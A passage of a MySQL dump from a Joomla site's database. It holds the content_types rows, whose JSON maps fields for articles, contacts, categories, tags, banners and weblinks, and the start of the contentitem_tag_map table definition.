INSERT INTO `fw3gt_content_types` VALUES (1,'Article','com_content.article','{\"special\":{\"dbtable\":\"#__content\",\"key\":\"id\",\"type\":\"Content\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"state\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"introtext\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"attribs\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"asset_id\", \"note\":\"note\"}, \"special\":{\"fulltext\":\"fulltext\"}}','ContentHelperRoute::getArticleRoute','{\"formFile\":\"administrator\\/components\\/com_content\\/models\\/forms\\/article.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"ordering\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(2,'Contact','com_contact.contact','{\"special\":{\"dbtable\":\"#__contact_details\",\"key\":\"id\",\"type\":\"Contact\",\"prefix\":\"ContactTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"address\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"image\", \"core_urls\":\"webpage\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\": {\"con_position\":\"con_position\",\"suburb\":\"suburb\",\"state\":\"state\",\"country\":\"country\",\"postcode\":\"postcode\",\"telephone\":\"telephone\",\"fax\":\"fax\",\"misc\":\"misc\",\"email_to\":\"email_to\",\"default_con\":\"default_con\",\"user_id\":\"user_id\",\"mobile\":\"mobile\",\"sortname1\":\"sortname1\",\"sortname2\":\"sortname2\",\"sortname3\":\"sortname3\"}}','ContactHelperRoute::getContactRoute','{\"formFile\":\"administrator\\/components\\/com_contact\\/models\\/forms\\/contact.xml\",\"hideFields\":[\"default_con\",\"checked_out\",\"checked_out_time\",\"version\",\"xreference\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"ordering\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"], \"displayLookup\":[ {\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ] }'),(3,'Newsfeed','com_newsfeeds.newsfeed','{\"special\":{\"dbtable\":\"#__newsfeeds\",\"key\":\"id\",\"type\":\"Newsfeed\",\"prefix\":\"NewsfeedsTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"link\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\": {\"numarticles\":\"numarticles\",\"cache_time\":\"cache_time\",\"rtl\":\"rtl\"}}','NewsfeedsHelperRoute::getNewsfeedRoute','{\"formFile\":\"administrator\\/components\\/com_newsfeeds\\/models\\/forms\\/newsfeed.xml\",\"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"ordering\"],\"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(4,'User','com_users.user','{\"special\":{\"dbtable\":\"#__users\",\"key\":\"id\",\"type\":\"User\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"null\",\"core_alias\":\"username\",\"core_created_time\":\"registerdate\",\"core_modified_time\":\"lastvisitDate\",\"core_body\":\"null\", \"core_hits\":\"null\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"access\":\"null\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"null\", \"core_language\":\"null\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"null\", \"core_ordering\":\"null\", \"core_metakey\":\"null\", \"core_metadesc\":\"null\", \"core_catid\":\"null\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\": {}}','UsersHelperRoute::getUserRoute',''),(5,'Article Category','com_content.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','ContentHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(6,'Contact Category','com_contact.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','ContactHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(7,'Newsfeeds Category','com_newsfeeds.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','NewsfeedsHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(8,'Tag','com_tags.tag','{\"special\":{\"dbtable\":\"#__tags\",\"key\":\"tag_id\",\"type\":\"Tag\",\"prefix\":\"TagsTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"urls\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"null\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\"}}','TagsHelperRoute::getTagRoute','{\"formFile\":\"administrator\\/components\\/com_tags\\/models\\/forms\\/tag.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\", \"lft\", \"rgt\", \"level\", \"path\", \"urls\", \"publish_up\", \"publish_down\"],\"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(10000,'Banner','com_banners.banner','{\"special\":{\"dbtable\":\"#__banners\",\"key\":\"id\",\"type\":\"Banner\",\"prefix\":\"BannersTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"name\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"null\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"link\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"null\", \"asset_id\":\"null\"}, \"special\":{\"imptotal\":\"imptotal\", \"impmade\":\"impmade\", \"clicks\":\"clicks\", \"clickurl\":\"clickurl\", \"custombannercode\":\"custombannercode\", \"cid\":\"cid\", \"purchase_type\":\"purchase_type\", \"track_impressions\":\"track_impressions\", \"track_clicks\":\"track_clicks\"}}','','{\"formFile\":\"administrator\\/components\\/com_banners\\/models\\/forms\\/banner.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\", \"reset\"],\"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"imptotal\", \"impmade\", \"reset\"], \"convertToInt\":[\"publish_up\", \"publish_down\", \"ordering\"], \"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"cid\",\"targetTable\":\"#__banner_clients\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(10001,'Banners Category','com_banners.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\": {\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"], \"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(10002,'Banner Client','com_banners.client','{\"special\":{\"dbtable\":\"#__banner_clients\",\"key\":\"id\",\"type\":\"Client\",\"prefix\":\"BannersTable\"}}','','','','{\"formFile\":\"administrator\\/components\\/com_banners\\/models\\/forms\\/client.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\"], \"ignoreChanges\":[\"checked_out\", \"checked_out_time\"], \"convertToInt\":[], \"displayLookup\":[]}'),(10003,'User Notes','com_users.note','{\"special\":{\"dbtable\":\"#__user_notes\",\"key\":\"id\",\"type\":\"Note\",\"prefix\":\"UsersTable\"}}','','','','{\"formFile\":\"administrator\\/components\\/com_users\\/models\\/forms\\/note.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\", \"publish_up\", \"publish_down\"],\"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\"], \"convertToInt\":[\"publish_up\", \"publish_down\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(10004,'User Notes Category','com_users.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"], \"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'),(10005,'Weblink','com_weblinks.weblink','{\"special\":{\"dbtable\":\"#__weblinks\",\"key\":\"id\",\"type\":\"Weblink\",\"prefix\":\"WeblinksTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"state\",\"core_alias\":\"alias\",\"core_created_time\":\"created\",\"core_modified_time\":\"modified\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"publish_up\",\"core_publish_down\":\"publish_down\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"featured\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"images\", \"core_urls\":\"url\", \"core_version\":\"version\", \"core_ordering\":\"ordering\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"catid\", \"core_xreference\":\"xreference\", \"asset_id\":\"null\"}, \"special\":{}}','WeblinksHelperRoute::getWeblinkRoute','{\"formFile\":\"administrator\\/components\\/com_weblinks\\/models\\/forms\\/weblink.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"featured\",\"images\"], \"ignoreChanges\":[\"modified_by\", \"modified\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"ordering\"], \"convertToInt\":[\"publish_up\", \"publish_down\", \"featured\", \"ordering\"], \"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"created_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_by\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"} ]}'),(10006,'Weblinks Category','com_weblinks.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','WeblinksHelperRoute::getCategoryRoute','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"asset_id\",\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"],\"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}');
/*!40000 ALTER TABLE `fw3gt_content_types` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_contentitem_tag_map`
--

DROP TABLE IF EXISTS `fw3gt_contentitem_tag_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_contentitem_tag_map` (
  `type_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `core_content_id` int(10) unsigned NOT NULL COMMENT 'PK from the core content table',
  `content_item_id` int(11) NOT NULL COMMENT 'PK from the content type table',
  `tag_id` int(10) unsigned NOT NULL COMMENT 'PK from the tag table',
  `tag_date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT 'Date of most recent save for this tag-item',
  `type_id` mediumint(8) NOT NULL COMMENT 'PK from the content_type table',
  UNIQUE KEY `uc_ItemnameTagid` (`type_id`,`content_item_id`,`tag_id`),
  KEY `idx_tag_type` (`tag_id`,`type_id`),
